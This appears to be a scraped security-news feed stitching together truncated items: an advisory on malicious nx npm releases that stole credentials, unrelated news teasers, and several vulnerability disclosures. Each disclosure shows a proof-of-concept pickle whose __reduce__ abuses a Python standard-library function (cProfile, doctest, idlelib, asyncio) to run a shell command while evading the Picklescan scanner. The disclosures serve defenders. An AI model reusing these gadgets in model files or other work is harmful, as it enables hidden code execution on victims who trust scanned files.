#git

## Summary Malicious versions of the [`nx` package](https://www.npmjs.com/package/nx), as well as some supporting plugin packages, were published to npm, containing code that scans the file system, collects credentials, and posts them to GitHub as a repo under user's accounts. ## Affected Versions of `nx` - 21.5.0 - Published at 6:32 PM - 20.9.0 - 20.10.0 - 21.6.0 - 20.11.0 - 21.7.0 - 21.8.0 - 20.12.0 - Published at 8:37 PM These versions have since been removed from NPM as of 10:44 PM EDT ## Affected Versions of `@nx/devkit`, `@nx/js`, `@nx/workspace`, `@nx/node` - 21.5.0 - Published at 6:32 PM - 20.9.0 - Published at 8:42 PM ## Affected Versions of `@nx/eslint` - 21.5.0 - Published at 6:32 PM These versions have since been removed from NPM as of 10:44 PM EDT ## Affected Versions of `@nx/key` and `@nx/enterprise-cloud` - 3.2.0 only - Published at 6:32 PM These versions have since been removed from NPM as of 6:20 AM EDT ## Attack Vector At this time, we bel...

To reduce the number of harmful apps targeting Android users, Google is making some changes.

A new advisory from Google and Mandiant reveals a widespread data breach in Salesforce. Learn how UNC6395 bypassed…

TheTruthSpy is at it again. A security researcher has discovered a flaw in the Android-based stalkerware that allows anyone to compromise any record in the system.

### Summary Using asyncio.unix_events._UnixSubprocessTransport._start function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to asyncio.unix_events._UnixSubprocessTransport._start function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from asyncio.unix_events import _UnixSubprocessTransport from types import SimpleNamespace class EvilAsyncioUnixSubprocessTransportStart: def __reduce__(self): fake_self = SimpleNamespace( _loop=None, _protocol=None, _proc=None ) args = "whoami" return _UnixSubprocessTransport._start, ( fake_self, args,...

### Summary Using cProfile.run function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to cProfile.run function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import cProfile class EvilCProfileRun: def __reduce__(self): # cProfile.run(statement) -> Profile().run(statement) -> exec(statement) return cProfile.run, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when...

### Summary Using cProfile.runctx function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to cProfile.runctx function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import cProfile class EvilCProfileRunctx: def __reduce__(self): # cProfile.runctx(cmd, globals, locals) -> exec(cmd, ...) return cProfile.runctx, ("__import__('os').system('whoami')", None, None) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but execu...

### Summary Using doctest.debug_script function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to doctest.debug_script function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from doctest import debug_script class EvilDoctestDebugScript: def __reduce__(self): # debug_script(src, pm=True) -> exec(src, ...) return debug_script, ("__import__('os').system('whoami')", True) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetect...

### Summary Using idlelib.pyshell.ModifiedInterpreter.runcode function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcode function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.pyshell import ModifiedInterpreter from types import SimpleNamespace class EvilIdlelibPyshellModifiedInterpreterRuncode: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace( locals={}, tkconsole=SimpleNamespace( executing=False, beginexecuting=str, cancele...

### Summary Using idlelib.pyshell.ModifiedInterpreter.runcommand function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcommand function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.pyshell import ModifiedInterpreter from types import SimpleNamespace class EvilIdlelibPyshellModifiedInterpreterRuncommand: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace( locals={}, tkconsole=SimpleNamespace(executing=False), rpcclt=None, debugger=None ) ...